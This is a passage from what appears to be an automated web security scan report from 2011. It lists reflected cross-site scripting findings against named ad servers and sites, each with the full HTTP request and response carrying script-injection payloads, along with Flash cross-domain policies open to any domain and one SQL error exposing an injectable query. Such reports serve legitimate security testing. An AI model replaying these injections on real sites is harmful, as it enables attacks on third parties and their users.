Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319dc711"><script>alert(1)</script>103b14f1145; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:19 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D1794967%26cid%3D696829%26tc%3D11020308002595319dc711%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E103b14f1145; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:11 GMT;path=/;httponly
Content-Length: 2946


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>GSB Mortgage, Inc. (Grapevine,TX)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO
...[SNIP]...
<frame src="/coupon/d544/544003/index5.html?scid=1794967&cid=696829&tc=11020308002595319dc711"><script>alert(1)</script>103b14f1145&rl_key=266706c08d1e97edf1c0c82556f3d3e7&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0

...[SNIP]...

4.701. http://optimized-by.rubiconproject.com/a/6272/9319/15153-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6272/9319/15153-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8010f"-alert(1)-"9cee6b4b2f1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6272/9319/15153-15.js?cb=0.5483633035328239 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=3;sz=300x250;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1%262119%3D1; ruid=8010f"-alert(1)-"9cee6b4b2f1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6272/9319; rdk2=0; ses2=9319^1; csi2=3191844.js^1^1296750694^1296750694

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:02:22 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6272/9319; expires=Thu, 03-Feb-2011 20:02:22 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Thu, 03-Feb-2011 20:02:22 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9319^1; expires=Fri, 04-Feb-2011 05:59:59 GMT; max-age=46657; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3173810.js^1^1296759742^1296759742; expires=Thu, 10-Feb-2011 19:02:22 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2270

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3173810"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=8010f"-alert(1)-"9cee6b4b2f1\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

4.702. http://optimized-by.rubiconproject.com/a/6272/9319/15153-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6272/9319/15153-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d78"-alert(1)-"0dfb266372e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6272/9319/15153-2.js?cb=0.19099231413565576 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=67d78"-alert(1)-"0dfb266372e; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1%262119%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:02:08 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=67d78"-alert(1)-"0dfb266372e^1^1296759728^2915161843; expires=Wed, 04-May-2011 19:02:08 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=6272/9319; expires=Thu, 03-Feb-2011 20:02:08 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Thu, 03-Feb-2011 20:02:08 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9319^1; expires=Fri, 04-Feb-2011 05:59:59 GMT; max-age=46671; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=719969.js^1^1296759728^1296759728; expires=Thu, 10-Feb-2011 19:02:08 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2611

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "719969" +
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=67d78"-alert(1)-"0dfb266372e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

4.703. http://porscheusa.com/911GTS-mosaic [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://porscheusa.com
Path:   /911GTS-mosaic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc74"><script>alert(1)</script>069d9c26fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:15:05 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Moved Temporarily</TITLE>
</HEAD><BODY>
<H1>Moved Temporarily</H1>
The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2">
...[SNIP]...

4.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://porscheusa.com
Path:   /911GTS-mosaic

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed1c"><script>alert(1)</script>60964318e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:14:56 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Moved Temporarily</TITLE>
</HEAD><BODY>
<H1>Moved Temporarily</H1>
The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1">
...[SNIP]...

4.705. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.srtk.net
Path:   /www/delivery/rd.php

Issue detail

The value of the trackerid request parameter is copied into the HTML document as plain text between tags. The payload 4e88d<script>alert(1)</script>4dbb23bcccc was submitted in the trackerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /www/delivery/rd.php?bannerid=372&trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc&SR=sr3_43119753_ms&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B232825021%3B56698875%3Bs%3Fhttp%3A%2F%2Fwww.us.hsbc.com%2F1%2F2%2F3%2Fhsbcpremier%2Fprom%2Fnov-10%3Fcode%3DPMD0006263%26WT.srch%3D1%26WT.mc_id%3DHBUS_PMD0006263 HTTP/1.1
Host: s1.srtk.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:23:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://s1.srtk.net/w3c/s1.xml", CP="NON IVAa HISa OTPa OUR DELa IND UNI PUR COM NAV INT"
Set-Cookie: MAXID=22038148057ac3fac5133f97badb01dc; expires=Fri, 03-Feb-2012 16:23:52 GMT; path=/
location: http://ad.doubleclick.net/clk;232825021;56698875;s?http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263
Content-Length: 362
Connection: close
Content-Type: application/x-javascript

SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd<script>
...[SNIP]...

4.706. http://www.feedzilla.com/rss/flash_feed.asp [Cat2 parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedzilla.com
Path:   /rss/flash_feed.asp

Issue detail

The value of the Cat2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5e4"><script>alert(1)</script>e49c418b94f was submitted in the Cat2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rss/flash_feed.asp?cat=business&Cat2=mortgage2c5e4"><script>alert(1)</script>e49c418b94f HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:42 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352

<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET">
...[SNIP]...

4.707. http://www.feedzilla.com/rss/flash_feed.asp [cat parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedzilla.com
Path:   /rss/flash_feed.asp

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4df"><script>alert(1)</script>de2ee12f61a was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rss/flash_feed.asp?cat=business3b4df"><script>alert(1)</script>de2ee12f61a&Cat2=mortgage HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:41 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352

<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET">
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 45 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://18.xg4ken.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 18.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:42:55 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "3a4007-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.2. https://220marketing9-px.rtrk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://220marketing9-px.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 220marketing9-px.rtrk.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:08:25 GMT
Server: Apache
Set-Cookie: RlocalUID=tc%3D11020308082556862; domain=.rtrk.com; path=/
Last-Modified: Sat, 09 May 2009 00:14:34 GMT
ETag: "cc-4696fa1390e80"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.3. http://69.16.184.135/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://69.16.184.135
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 69.16.184.135

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 18:52:09 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Accept-Ranges: none
Expires: Thu, 03 Feb 2011 19:52:09 GMT
Content-Length: 217
Content-Type: text/xml
X-HW: 1296759129.cc031d1

<?xml version="1.0"?>
<cross-domain-policy>
<!-- This is a master-policy file -->
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*" to-ports="80" />
</cross
...[SNIP]...

5.4. http://a.rfihub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 199
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.6. http://ad.br.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

